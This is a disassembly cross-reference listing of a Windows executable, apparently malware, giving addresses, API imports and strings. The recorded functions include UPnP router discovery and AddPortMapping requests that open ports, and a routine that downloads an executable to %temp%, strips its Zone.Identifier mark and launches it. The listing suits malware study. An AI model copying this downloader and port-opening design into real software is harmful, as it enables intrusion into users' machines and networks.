0x406ef8	0x40d290	import	0x406e90	ntdll.dll.RtlTimeToSecondsSince1980
0x406f2f	0x40d054	import	0x406e90	KERNEL32.dll.GetCurrentProcessId
0x406f58	0x40d064	import	0x406e90	KERNEL32.dll.HeapCreate
0x406f79	0x40d058	import	0x406e90	KERNEL32.dll.HeapSetInformation
0x406f90	0x40d06c	import	0x406e90	KERNEL32.dll.HeapAlloc
0x406fd2	0x40d290	import	0x406e90	ntdll.dll.RtlTimeToSecondsSince1980
0x406ffe	0x40d0d4	import	0x406e90	KERNEL32.dll.Sleep
0x407066	0x40d068	import	0x406e90	KERNEL32.dll.HeapFree
0x4070a3	0x40d100	import	0x406e90	KERNEL32.dll.LeaveCriticalSection
0x4070c9	0x40d10c	import	0x4070c0	KERNEL32.dll.EnterCriticalSection
0x4070f6	0x40d100	import	0x4070c0	KERNEL32.dll.LeaveCriticalSection
0x407106	0x40d29c	import	0x4070c0	ntdll.dll.NtQuerySystemTime
0x407116	0x40d290	import	0x4070c0	ntdll.dll.RtlTimeToSecondsSince1980
0x40712f	0x40d100	import	0x4070c0	KERNEL32.dll.LeaveCriticalSection
0x40714c	0x40d0fc	import	0x407140	KERNEL32.dll.InitializeCriticalSection
0x407157	0x40d29c	import	0x407140	ntdll.dll.NtQuerySystemTime
0x407167	0x40d290	import	0x407140	ntdll.dll.RtlTimeToSecondsSince1980
0x407197	0x40d104	import	0x407140	KERNEL32.dll.CreateFileW
0x4071b7	0x40d110	import	0x407140	KERNEL32.dll.CreateFileMappingW
0x4071d4	0x40d0f0	import	0x407140	KERNEL32.dll.MapViewOfFile
0x4071e3	0x40d0ec	import	0x407140	KERNEL32.dll.GetFileSize
0x407200	0x40d29c	import	0x407140	ntdll.dll.NtQuerySystemTime
0x407210	0x40d290	import	0x407140	ntdll.dll.RtlTimeToSecondsSince1980
0x407236	0x40d0f4	import	0x407140	KERNEL32.dll.UnmapViewOfFile
0x407245	0x40d114	import	0x407140	KERNEL32.dll.CloseHandle
0x40724c	0x40d114	import	0x407140	KERNEL32.dll.CloseHandle
0x407252	0x40d10c	import	0x407140	KERNEL32.dll.EnterCriticalSection
0x407264	0x40d100	import	0x407140	KERNEL32.dll.LeaveCriticalSection
0x407279	0x4072cd	string	0x407140	_^][
0x4072b6	0x40d078	import	0x407140	KERNEL32.dll.CreateThread
0x4072ff	0x40dfcc	string	0x4072e0	twizt)
0x40730e	0x40d0c0	import	0x4072e0	KERNEL32.dll.lstrlenA
0x407315	0x40dfcc	string	0x4072e0	twizt)
0x40733a	0x40d054	import	0x4072e0	KERNEL32.dll.GetCurrentProcessId
0x407370	0x40d068	import	0x4072e0	KERNEL32.dll.HeapFree
0x4073a4	0x40d054	import	0x407390	KERNEL32.dll.GetCurrentProcessId
0x4073c6	0x40d06c	import	0x407390	KERNEL32.dll.HeapAlloc
0x407487	0x4072e0	string	0x407390	QSUV
0x4074da	0x4072e0	string	0x4074a0	QSUV
0x4074f3	0x40dfcc	string	0x4074f0	twizt)
0x4074fa	0x40d0c0	import	0x4074f0	KERNEL32.dll.lstrlenA
0x407501	0x40dfcc	string	0x4074f0	twizt)
0x40754b	0x40d054	import	0x4074f0	KERNEL32.dll.GetCurrentProcessId
0x407581	0x40d068	import	0x4074f0	KERNEL32.dll.HeapFree
0x4075cb	0x4074f0	string	0x4075b0	SVPh
0x4075dd	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x407635	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x407682	0x4072e0	string	0x4075b0	QSUV
0x407696	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x4076dc	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x4076fa	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x407731	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x407757	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x40777b	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x4077ba	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x40784b	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x40786c	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x407899	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x4078ad	0x40d22c	import	0x4075b0	WS2_32.dll.inet_ntoa
0x4078d0	0x40d054	import	0x4075b0	KERNEL32.dll.GetCurrentProcessId
0x407906	0x40d068	import	0x4075b0	KERNEL32.dll.HeapFree
0x407998	0x40d054	import	0x407920	KERNEL32.dll.GetCurrentProcessId
0x4079d6	0x40d068	import	0x407920	KERNEL32.dll.HeapFree
0x407a1f	0x40d054	import	0x407920	KERNEL32.dll.GetCurrentProcessId
0x407a55	0x40d068	import	0x407920	KERNEL32.dll.HeapFree
0x407b4a	0x40d054	import	0x407a70	KERNEL32.dll.GetCurrentProcessId
0x407b80	0x40d068	import	0x407a70	KERNEL32.dll.HeapFree
0x407b95	0x40d00c	import	0x407b90	ADVAPI32.dll.CryptAcquireContextW
0x407bae	0x40d004	import	0x407b90	ADVAPI32.dll.CryptGenRandom
0x407bb4	0x40d008	import	0x407b90	ADVAPI32.dll.CryptReleaseContext
0x407e48	0x40d054	import	0x407e40	KERNEL32.dll.GetCurrentProcessId
0x407e75	0x40d05c	import	0x407e40	KERNEL32.dll.GetProcessHeaps
0x407ea4	0x40d064	import	0x407e40	KERNEL32.dll.HeapCreate
0x407ec5	0x40d058	import	0x407e40	KERNEL32.dll.HeapSetInformation
0x407f01	0x40d06c	import	0x407e40	KERNEL32.dll.HeapAlloc
0x407f9a	0x407fae	string	0x407f70	3\vT$
0x407fd2	0x407fee	string	0x407f70	_^][
0x408008	0x408015	string	0x408000	SUVW3
0x40800d	0x408015	string	0x408000	SUVW3
0x40815a	0x40824c	string	0x408130	_^[Ë\r\f blocks=Basic Latin,Latin-1 Supplement
0x408160	0x40d054	import	0x408130	KERNEL32.dll.GetCurrentProcessId
0x408180	0x40d06c	import	0x408130	KERNEL32.dll.HeapAlloc
0x4081e4	0x40824c	string	0x408130	_^[Ë\r\f blocks=Basic Latin,Latin-1 Supplement
0x4081f0	0x40824c	string	0x408130	_^[Ë\r\f blocks=Basic Latin,Latin-1 Supplement
0x4081fe	0x40824c	string	0x408130	_^[Ë\r\f blocks=Basic Latin,Latin-1 Supplement
0x40827a	0x40839a	string	0x408250	_^][
0x408280	0x40d054	import	0x408250	KERNEL32.dll.GetCurrentProcessId
0x4082a0	0x40d06c	import	0x408250	KERNEL32.dll.HeapAlloc
0x408319	0x40839a	string	0x408250	_^][
0x408325	0x40839a	string	0x408250	_^][
0x408335	0x40839a	string	0x408250	_^][
0x4083d2	0x40d054	import	0x4083a0	KERNEL32.dll.GetCurrentProcessId
0x40840c	0x40d068	import	0x4083a0	KERNEL32.dll.HeapFree
0x408443	0x40d0c0	import	0x408430	KERNEL32.dll.lstrlenA
0x408462	0x40d0e0	import	0x408430	KERNEL32.dll.MultiByteToWideChar
0x408472	0x40d054	import	0x408430	KERNEL32.dll.GetCurrentProcessId
0x4084a0	0x40d05c	import	0x408430	KERNEL32.dll.GetProcessHeaps
0x4084c2	0x40d054	import	0x408430	KERNEL32.dll.GetCurrentProcessId
0x4084ce	0x40d064	import	0x408430	KERNEL32.dll.HeapCreate
0x4084ef	0x40d058	import	0x408430	KERNEL32.dll.HeapSetInformation
0x408527	0x40d06c	import	0x408430	KERNEL32.dll.HeapAlloc
0x40856d	0x40d0e0	import	0x408430	KERNEL32.dll.MultiByteToWideChar
0x408596	0x40d054	import	0x408430	KERNEL32.dll.GetCurrentProcessId
0x4085a2	0x4085d2	string	0x408430	[_^3
0x4085af	0x4085d2	string	0x408430	[_^3
0x4085cc	0x40d068	import	0x408430	KERNEL32.dll.HeapFree
0x408616	0x40d0c0	import	0x408600	KERNEL32.dll.lstrlenA
0x408626	0x40d054	import	0x408600	KERNEL32.dll.GetCurrentProcessId
0x408653	0x40d05c	import	0x408600	KERNEL32.dll.GetProcessHeaps
0x408681	0x40d064	import	0x408600	KERNEL32.dll.HeapCreate
0x4086a2	0x40d058	import	0x408600	KERNEL32.dll.HeapSetInformation
0x4086da	0x40d06c	import	0x408600	KERNEL32.dll.HeapAlloc
0x40878e	0x40d1a4	import	0x408730	USER32.dll.wvsprintfA
0x40884f	0x40d0cc	import	0x408840	KERNEL32.dll.GetTickCount
0x408874	0x40d208	import	0x408840	WS2_32.dll.ioctlsocket
0x40889a	0x40d204	import	0x408840	WS2_32.dll.recv
0x4088ab	0x40d0cc	import	0x408840	KERNEL32.dll.GetTickCount
0x4088bf	0x40d0d4	import	0x408840	KERNEL32.dll.Sleep
0x4088c5	0x40d0cc	import	0x408840	KERNEL32.dll.GetTickCount
0x4088fa	0x40d240	import	0x4088f0	WS2_32.dll.socket
0x408929	0x40d234	import	0x4088f0	WS2_32.dll.htons
0x408944	0x40d228	import	0x4088f0	WS2_32.dll.connect
0x408952	0x40d23c	import	0x4088f0	WS2_32.dll.shutdown
0x408959	0x40d244	import	0x4088f0	WS2_32.dll.closesocket
0x40897f	0x40d040	import	0x408970	KERNEL32.dll.InterlockedExchangeAdd
0x408987	0x408aff	string	0x408970	_^][
0x40899e	0x408aff	string	0x408970	_^][
0x4089a5	0x40d044	import	0x408970	KERNEL32.dll.InterlockedIncrement
0x4089dc	0x4072e0	string	0x408970	QSUV
0x4089ec	0x40d22c	import	0x408970	WS2_32.dll.inet_ntoa
0x408aa0	0x40d054	import	0x408970	KERNEL32.dll.GetCurrentProcessId
0x408ad6	0x40d068	import	0x408970	KERNEL32.dll.HeapFree
0x408ae9	0x40d050	import	0x408970	KERNEL32.dll.InterlockedDecrement
0x408af2	0x40d23c	import	0x408970	WS2_32.dll.shutdown
0x408af9	0x40d244	import	0x408970	WS2_32.dll.closesocket
0x408dc0	0x40d054	import	0x408dc0	KERNEL32.dll.GetCurrentProcessId
0x408de0	0x40d06c	import	0x408dc0	KERNEL32.dll.HeapAlloc
0x408e06	0x40d0fc	import	0x408dc0	KERNEL32.dll.InitializeCriticalSection
0x408e1a	0x40d114	import	0x408e10	KERNEL32.dll.CloseHandle
0x408e21	0x40d04c	import	0x408e10	KERNEL32.dll.WaitForSingleObject
0x408e7f	0x40d10c	import	0x408e70	KERNEL32.dll.EnterCriticalSection
0x408eb0	0x40d078	import	0x408e70	KERNEL32.dll.CreateThread
0x408eca	0x40d100	import	0x408e70	KERNEL32.dll.LeaveCriticalSection
0x408ee2	0x40d03c	import	0x408ee0	KERNEL32.dll.GetCurrentThread
0x408eec	0x40d034	import	0x408ee0	KERNEL32.dll.GetThreadPriority
0x408efb	0x40d038	import	0x408ee0	KERNEL32.dll.SetThreadPriority
0x408f09	0x40d040	import	0x408ee0	KERNEL32.dll.InterlockedExchangeAdd
0x408f1a	0x40d10c	import	0x408ee0	KERNEL32.dll.EnterCriticalSection
0x408f44	0x40d04c	import	0x408ee0	KERNEL32.dll.WaitForSingleObject
0x408f59	0x40d100	import	0x408ee0	KERNEL32.dll.LeaveCriticalSection
0x408f67	0x40d0d4	import	0x408ee0	KERNEL32.dll.Sleep
0x408f6f	0x40d03c	import	0x408ee0	KERNEL32.dll.GetCurrentThread
0x408f83	0x40d038	import	0x408ee0	KERNEL32.dll.SetThreadPriority
0x408f9f	0x40d10c	import	0x408f90	KERNEL32.dll.EnterCriticalSection
0x408fad	0x40d114	import	0x408f90	KERNEL32.dll.CloseHandle
0x408fc4	0x40d100	import	0x408f90	KERNEL32.dll.LeaveCriticalSection
0x408fcb	0x40d030	import	0x408f90	KERNEL32.dll.DeleteCriticalSection
0x408fd4	0x40d054	import	0x408f90	KERNEL32.dll.GetCurrentProcessId
0x408fda	0x40d068	import	0x408f90	KERNEL32.dll.HeapFree
0x409013	0x40d054	import	0x408f90	KERNEL32.dll.GetCurrentProcessId
0x409058	0x40d29c	import	0x409050	ntdll.dll.NtQuerySystemTime
0x409068	0x40d290	import	0x409050	ntdll.dll.RtlTimeToSecondsSince1980
0x40910a	0x40921d	string	0x4090f0	_^][
0x409110	0x40d10c	import	0x4090f0	KERNEL32.dll.EnterCriticalSection
0x409116	0x40d00c	import	0x4090f0	ADVAPI32.dll.CryptAcquireContextW
0x409154	0x40d004	import	0x4090f0	ADVAPI32.dll.CryptGenRandom
0x409160	0x40d008	import	0x4090f0	ADVAPI32.dll.CryptReleaseContext
0x409187	0x40d100	import	0x4090f0	KERNEL32.dll.LeaveCriticalSection
0x409193	0x40d040	import	0x4090f0	KERNEL32.dll.InterlockedExchangeAdd
0x4091e2	0x4072e0	string	0x4090f0	QSUV
0x4091f2	0x40d22c	import	0x4090f0	WS2_32.dll.inet_ntoa
0x409203	0x40d04c	import	0x4090f0	KERNEL32.dll.WaitForSingleObject
0x409281	0x40d144	import	0x409260	OLEAUT32.dll.SysReAllocString
0x4092a7	0x40d2c0	import	0x409260	ole32.dll.CoCreateInstance
0x40932b	0x40d140	import	0x409260	OLEAUT32.dll.SysStringLen
0x409331	0x40d054	import	0x409260	KERNEL32.dll.GetCurrentProcessId
0x409368	0x40d068	import	0x409260	KERNEL32.dll.HeapFree
0x4093c9	0x409422	string	0x409380	F;t$
0x4093d1	0x409422	string	0x409380	F;t$
0x4093f9	0x40d0b4	import	0x409380	KERNEL32.dll.lstrcmpiW
0x40940c	0x40d140	import	0x409380	OLEAUT32.dll.SysStringLen
0x4094e8	0x40d1c4	import	0x409490	WININET.dll.InternetCrackUrlA
0x4094f4	0x40d1d4	import	0x409490	WININET.dll.InternetOpenA
0x40951a	0x40d1e4	import	0x409490	WININET.dll.InternetConnectA
0x409542	0x40d1e0	import	0x409490	WININET.dll.HttpOpenRequestA
0x409557	0x40d1d8	import	0x409490	WININET.dll.HttpSendRequestA
0x40956e	0x40d1e8	import	0x409490	WININET.dll.InternetReadFile
0x4095f2	0x40d1d0	import	0x409490	WININET.dll.InternetCloseHandle
0x4095f9	0x40d1d0	import	0x409490	WININET.dll.InternetCloseHandle
0x409601	0x40d1d0	import	0x409490	WININET.dll.InternetCloseHandle
0x409627	0x40d160	import	0x409620	SHLWAPI.dll.StrChrA
0x40962e	0x40d164	import	0x409620	SHLWAPI.dll.StrCmpNIA
0x409636	0x40d1f0	import	0x409620	WS2_32.dll.recvfrom
0x409674	0x40d0d4	import	0x409620	KERNEL32.dll.Sleep
0x40967e	0x40dfd8	string	0x409620	HTTP/1.1 200 OK
0x409693	0x40dfe8	string	0x409620	LOCATION:
0x40969d	0x40d15c	import	0x409620	SHLWAPI.dll.StrStrIA
0x4096f0	0x40d240	import	0x4096e0	WS2_32.dll.socket
0x409723	0x40d234	import	0x4096e0	WS2_32.dll.htons
0x409729	0x40dff4	string	0x4096e0	239.255.255.250
0x409733	0x40d230	import	0x4096e0	WS2_32.dll.inet_addr
0x409751	0x40d1f4	import	0x4096e0	WS2_32.dll.setsockopt
0x409785	0x40d1fc	import	0x4096e0	WS2_32.dll.bind
0x409793	0x40e008	string	0x4096e0	M-SEARCH * HTTP/1.1\r\nST:urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\nMX: 3\r\nMan:"ssdp:discover"\r\nHOST: 239.255.255.250:1900\r\n\r\n
0x409798	0x40d0c0	import	0x4096e0	KERNEL32.dll.lstrlenA
0x40979f	0x40e008	string	0x4096e0	M-SEARCH * HTTP/1.1\r\nST:urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\nMX: 3\r\nMan:"ssdp:discover"\r\nHOST: 239.255.255.250:1900\r\n\r\n
0x4097a5	0x40d1f8	import	0x4096e0	WS2_32.dll.sendto
0x4097be	0x40d208	import	0x4096e0	WS2_32.dll.ioctlsocket
0x409815	0x40d23c	import	0x4096e0	WS2_32.dll.shutdown
0x40981c	0x40d244	import	0x4096e0	WS2_32.dll.closesocket
0x409882	0x40d0b4	import	0x409840	KERNEL32.dll.lstrcmpiW
0x4098a4	0x409964	string	0x409840	C;\$
0x4098b0	0x409964	string	0x409840	C;\$
0x4098da	0x40e090	string	0x409840	service
0x4098ea	0x40e0a0	string	0x409840	serviceType
0x409933	0x40d140	import	0x409840	OLEAUT32.dll.SysStringLen
0x40994a	0x40d140	import	0x409840	OLEAUT32.dll.SysStringLen
0x4099b5	0x40e0b8	string	0x409990	serviceList
0x409a72	0x40d0b4	import	0x409a30	KERNEL32.dll.lstrcmpiW
0x409a94	0x409b54	string	0x409a30	C;\$
0x409aa0	0x409b54	string	0x409a30	C;\$
0x409aca	0x40e0d0	string	0x409a30	device
0x409ada	0x40e0e0	string	0x409a30	deviceType
0x409b23	0x40d140	import	0x409a30	OLEAUT32.dll.SysStringLen
0x409b3a	0x40d140	import	0x409a30	OLEAUT32.dll.SysStringLen
0x409ba5	0x40e0f8	string	0x409b80	deviceList
0x409c24	0x40e110	string	0x409c20	urn:schemas-upnp-org:device:InternetGatewayDevice:1
0x409c49	0x40e178	string	0x409c20	urn:schemas-upnp-org:device:WANDevice:1
0x409c61	0x40e1c8	string	0x409c20	urn:schemas-upnp-org:device:WANConnectionDevice:1
0x409c75	0x40e230	string	0x409c20	urn:schemas-upnp-org:service:WANIPConnection:1
0x409c88	0x40e290	string	0x409c20	urn:schemas-upnp-org:service:WANPPPConnection:1
0x409c9d	0x40e2f0	string	0x409c20	controlURL
0x409d02	0x40e308	string	0x409d00	URLBase
0x409db9	0x409d00	string	0x409d40	QVh\b
0x409dcd	0x40d140	import	0x409d40	OLEAUT32.dll.SysStringLen
0x409ddf	0x40e318	string	0x409d40	%S%S
0x409e1c	0x40d054	import	0x409d40	KERNEL32.dll.GetCurrentProcessId
0x409e53	0x40d068	import	0x409d40	KERNEL32.dll.HeapFree
0x409ec8	0x40d1c4	import	0x409e70	WININET.dll.InternetCrackUrlA
0x409ed3	0x40e320	string	0x409e70	Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
0x409ed8	0x40d1d4	import	0x409e70	WININET.dll.InternetOpenA
0x409efe	0x40d1e4	import	0x409e70	WININET.dll.InternetConnectA
0x409f20	0x40e350	string	0x409e70	POST
0x409f26	0x40d1e0	import	0x409e70	WININET.dll.HttpOpenRequestA
0x409f3d	0x40e648	string	0x409e70	SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
0x409f43	0x40d1dc	import	0x409e70	WININET.dll.HttpAddRequestHeadersA
0x409f5d	0x40e358	string	0x409e70	Content-Type: text/xml; charset="utf-8"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n
0x409f63	0x40d1d8	import	0x409e70	WININET.dll.HttpSendRequestA
0x409f6d	0x40d1e8	import	0x409e70	WININET.dll.InternetReadFile
0x409feb	0x40d1d0	import	0x409e70	WININET.dll.InternetCloseHandle
0x409ff2	0x40d1d0	import	0x409e70	WININET.dll.InternetCloseHandle
0x409ffa	0x40d1d0	import	0x409e70	WININET.dll.InternetCloseHandle
0x40a01b	0x40d22c	import	0x40a010	WS2_32.dll.inet_ntoa
0x40a035	0x40e3c0	string	0x40a010	<?xml version="1.0"?>\r\n<SOAP-ENV:Envelope\r\n xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"\r\n SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\r\n<SOAP-ENV:Body>\r\n<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">\r\n<NewRemoteHost></NewRemoteHost>\r\n<NewExternalPort>%d</NewExternalPort>\r\n<NewProtocol>%s</NewProtocol>\r\n<NewInternalPort>%d</NewInternalPort>\r\n<NewInternalClient>%s</NewInternalClient>\r\n<NewEnabled>1</NewEnabled>\r\n<NewPortMappingDescription></NewPortMappingDescription>\r\n<NewLeaseDuration>0</NewLeaseDuration>\r\n</m:AddPortMapping>\r\n</SOAP-ENV:Body>\r\n</SOAP-ENV:Envelope>\r\n\r\n
0x40a062	0x40d068	import	0x40a010	KERNEL32.dll.HeapFree
0x40a076	0x40d054	import	0x40a010	KERNEL32.dll.GetCurrentProcessId
0x40a0aa	0x40d054	import	0x40a010	KERNEL32.dll.GetCurrentProcessId
0x40a0b6	0x40a0de	string	0x40a010	_][^
0x40a0c3	0x40a0de	string	0x40a010	_][^
0x40a0fa	0x40d2bc	import	0x40a0f0	ole32.dll.CoInitializeEx
0x40a1dc	0x40d02c	import	0x40a180	KERNEL32.dll.CreateProcessW
0x40a1fc	0x40d0cc	import	0x40a1f0	KERNEL32.dll.GetTickCount
0x40a203	0x40d274	import	0x40a1f0	msvcrt.dll.srand
0x40a209	0x40d270	import	0x40a1f0	msvcrt.dll.rand
0x40a226	0x40d0d4	import	0x40a1f0	KERNEL32.dll.Sleep
0x40a239	0x40e694	string	0x40a1f0	%temp%
0x40a23e	0x40d074	import	0x40a1f0	KERNEL32.dll.ExpandEnvironmentStringsW
0x40a264	0x40d294	import	0x40a1f0	ntdll.dll.mbstowcs
0x40a29e	0x40e6a4	string	0x40a1f0	%s\%d%d.exe
0x40a2a4	0x40d190	import	0x40a1f0	USER32.dll.wsprintfW
0x40a2b5	0x40e6c0	string	0x40a1f0	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
0x40a2ba	0x40d1cc	import	0x40a1f0	WININET.dll.InternetOpenW
0x40a2df	0x40d1c8	import	0x40a1f0	WININET.dll.InternetOpenUrlW
0x40a306	0x40d104	import	0x40a1f0	KERNEL32.dll.CreateFileW
0x40a328	0x40d1e8	import	0x40a1f0	WININET.dll.InternetReadFile
0x40a347	0x40d0f8	import	0x40a1f0	KERNEL32.dll.WriteFile
0x40a383	0x40d114	import	0x40a1f0	KERNEL32.dll.CloseHandle
0x40a398	0x40dd44	string	0x40a1f0	%s:Zone.Identifier
0x40a39e	0x40d190	import	0x40a1f0	USER32.dll.wsprintfW
0x40a3af	0x40d0a8	import	0x40a1f0	KERNEL32.dll.DeleteFileW
0x40a3c6	0x40d114	import	0x40a1f0	KERNEL32.dll.CloseHandle
0x40a3cd	0x40d1d0	import	0x40a1f0	WININET.dll.InternetCloseHandle
0x40a3d4	0x40d1d0	import	0x40a1f0	WININET.dll.InternetCloseHandle
0x40a404	0x40d054	import	0x40a3f0	KERNEL32.dll.GetCurrentProcessId
0x40a42d	0x40d064	import	0x40a3f0	KERNEL32.dll.HeapCreate
0x40a43a	0x40a460	string	0x40a3f0	j4j\bP3
0x40a44e	0x40d058	import	0x40a3f0	KERNEL32.dll.HeapSetInformation
0x40a467	0x40d06c	import	0x40a3f0	KERNEL32.dll.HeapAlloc
0x40a49a	0x40d084	import	0x40a3f0	KERNEL32.dll.CreateEventA
0x40a4a9	0x40d240	import	0x40a3f0	WS2_32.dll.socket
0x40a4ec	0x40d234	import	0x40a3f0	WS2_32.dll.htons
0x40a50e	0x40d1f4	import	0x40a3f0	WS2_32.dll.setsockopt
0x40a51f	0x40d1fc	import	0x40a3f0	WS2_32.dll.bind
0x40a54c	0x40d078	import	0x40a3f0	KERNEL32.dll.CreateThread
0x40a5ab	0x40a598	string	0x40a560	9\bu\nf
0x40a5b8	0x40d054	import	0x40a560	KERNEL32.dll.GetCurrentProcessId
0x40a5d7	0x40d06c	import	0x40a560	KERNEL32.dll.HeapAlloc
0x40a612	0x40d29c	import	0x40a560	ntdll.dll.NtQuerySystemTime
0x40a620	0x40d290	import	0x40a560	ntdll.dll.RtlTimeToSecondsSince1980
0x40a6b4	0x40d2a0	import	0x40a560	ntdll.dll.memmove
0x40a70b	0x40d208	import	0x40a6e0	WS2_32.dll.ioctlsocket
0x40a775	0x40d1f0	import	0x40a6e0	WS2_32.dll.recvfrom
0x40a78b	0x40d040	import	0x40a6e0	KERNEL32.dll.InterlockedExchangeAdd
0x40a7ac	0x40d04c	import	0x40a6e0	KERNEL32.dll.WaitForSingleObject
0x40a7bd	0x40d054	import	0x40a6e0	KERNEL32.dll.GetCurrentProcessId
0x40a7f3	0x40d068	import	0x40a6e0	KERNEL32.dll.HeapFree
0x40a88f	0x40d234	import	0x40a810	WS2_32.dll.htons
0x40a8b7	0x40d1f8	import	0x40a810	WS2_32.dll.sendto
0x40a8cc	0x40d040	import	0x40a810	KERNEL32.dll.InterlockedExchangeAdd
0x40a8f6	0x40d054	import	0x40a810	KERNEL32.dll.GetCurrentProcessId
0x40a92c	0x40d068	import	0x40a810	KERNEL32.dll.HeapFree
0x40a95a	0x40d09c	import	0x40a940	KERNEL32.dll.SetEvent
0x40a966	0x40d04c	import	0x40a940	KERNEL32.dll.WaitForSingleObject
0x40a970	0x40d114	import	0x40a940	KERNEL32.dll.CloseHandle
0x40a979	0x40d068	import	0x40a940	KERNEL32.dll.HeapFree
0x40a993	0x40d054	import	0x40a940	KERNEL32.dll.GetCurrentProcessId
0x40a9ce	0x40d054	import	0x40a940	KERNEL32.dll.GetCurrentProcessId
0x40aa13	0x40d23c	import	0x40a940	WS2_32.dll.shutdown
0x40aa1a	0x40d244	import	0x40a940	WS2_32.dll.closesocket
0x40aa20	0x40d054	import	0x40a940	KERNEL32.dll.GetCurrentProcessId
0x40aa65	0x40d054	import	0x40aa60	KERNEL32.dll.GetCurrentProcessId
0x40aa8e	0x40d064	import	0x40aa60	KERNEL32.dll.HeapCreate
0x40aa9b	0x40aac1	string	0x40aa60	j4j\bP3
0x40aaaf	0x40d058	import	0x40aa60	KERNEL32.dll.HeapSetInformation
0x40aac8	0x40d06c	import	0x40aa60	KERNEL32.dll.HeapAlloc
0x40aafb	0x40d084	import	0x40aa60	KERNEL32.dll.CreateEventA
0x40ab0a	0x40d240	import	0x40aa60	WS2_32.dll.socket
0x40ab4b	0x40d1fc	import	0x40aa60	WS2_32.dll.bind
0x40ab78	0x40d078	import	0x40aa60	KERNEL32.dll.CreateThread
0x40ac1a	0x40d10c	import	0x40ac10	KERNEL32.dll.EnterCriticalSection
0x40ac3c	0x40d100	import	0x40ac10	KERNEL32.dll.LeaveCriticalSection
0x40adcc	0x40d10c	import	0x40adb0	KERNEL32.dll.EnterCriticalSection
0x40adf7	0x40d100	import	0x40adb0	KERNEL32.dll.LeaveCriticalSection
0x40ae01	0x40d054	import	0x40adb0	KERNEL32.dll.GetCurrentProcessId
0x40ae23	0x40d06c	import	0x40adb0	KERNEL32.dll.HeapAlloc
0x40ae6f	0x40d258	import	0x40adb0	WS2_32.dll.getpeername
0x40ae83	0x40d098	import	0x40adb0	KERNEL32.dll.CreateIoCompletionPort
0x40ae98	0x40d048	import	0x40adb0	KERNEL32.dll.InterlockedExchange
0x40aebe	0x40d0fc	import	0x40adb0	KERNEL32.dll.InitializeCriticalSection
0x40aec8	0x40d044	import	0x40adb0	KERNEL32.dll.InterlockedIncrement
0x40aee4	0x40d23c	import	0x40adb0	WS2_32.dll.shutdown
0x40aeeb	0x40d244	import	0x40adb0	WS2_32.dll.closesocket
0x40af1f	0x40d044	import	0x40af00	KERNEL32.dll.InterlockedIncrement
0x40af5a	0x40d10c	import	0x40af40	KERNEL32.dll.EnterCriticalSection
0x40af6c	0x40d044	import	0x40af40	KERNEL32.dll.InterlockedIncrement
0x40af8d	0x40d050	import	0x40af40	KERNEL32.dll.InterlockedDecrement
0x40afa5	0x40d040	import	0x40af40	KERNEL32.dll.InterlockedExchangeAdd
0x40afdf	0x40d050	import	0x40af40	KERNEL32.dll.InterlockedDecrement
0x40aff4	0x40d100	import	0x40af40	KERNEL32.dll.LeaveCriticalSection
0x40affe	0x40d09c	import	0x40af40	KERNEL32.dll.SetEvent
0x40b00b	0x40d090	import	0x40af40	KERNEL32.dll.PostQueuedCompletionStatus
0x40b036	0x40d114	import	0x40af40	KERNEL32.dll.CloseHandle
0x40b049	0x40d210	import	0x40af40	WS2_32.dll.WSACloseEvent
0x40b055	0x40d23c	import	0x40af40	WS2_32.dll.shutdown
0x40b05c	0x40d244	import	0x40af40	WS2_32.dll.closesocket
0x40b066	0x40d030	import	0x40af40	KERNEL32.dll.DeleteCriticalSection
0x40b06c	0x40d054	import	0x40af40	KERNEL32.dll.GetCurrentProcessId
0x40b0a4	0x40d068	import	0x40af40	KERNEL32.dll.HeapFree
0x40b127	0x40d10c	import	0x40b110	KERNEL32.dll.EnterCriticalSection
0x40b13b	0x40d040	import	0x40b110	KERNEL32.dll.InterlockedExchangeAdd
0x40b14b	0x40d100	import	0x40b110	KERNEL32.dll.LeaveCriticalSection
0x40b17b	0x40d054	import	0x40b110	KERNEL32.dll.GetCurrentProcessId
0x40b181	0x40d068	import	0x40b110	KERNEL32.dll.HeapFree
0x40b1ba	0x40d054	import	0x40b110	KERNEL32.dll.GetCurrentProcessId
0x40b1f4	0x40d100	import	0x40b110	KERNEL32.dll.LeaveCriticalSection
0x40b236	0x40d040	import	0x40b210	KERNEL32.dll.InterlockedExchangeAdd
0x40b27c	0x40d23c	import	0x40b210	WS2_32.dll.shutdown
0x40b283	0x40d244	import	0x40b210	WS2_32.dll.closesocket
0x40b2a6	0x40d050	import	0x40b210	KERNEL32.dll.InterlockedDecrement
0x40b31c	0x40d0cc	import	0x40b310	KERNEL32.dll.GetTickCount
0x40b331	0x40d04c	import	0x40b310	KERNEL32.dll.WaitForSingleObject
0x40b351	0x40d254	import	0x40b310	WS2_32.dll.WSAWaitForMultipleEvents
0x40b36e	0x40d220	import	0x40b310	WS2_32.dll.WSAEnumNetworkEvents
0x40b3a0	0x40d25c	import	0x40b310	WS2_32.dll.accept
0x40b3e8	0x40d0cc	import	0x40b310	KERNEL32.dll.GetTickCount
0x40b3fd	0x40d10c	import	0x40b310	KERNEL32.dll.EnterCriticalSection
0x40b424	0x40d100	import	0x40b310	KERNEL32.dll.LeaveCriticalSection
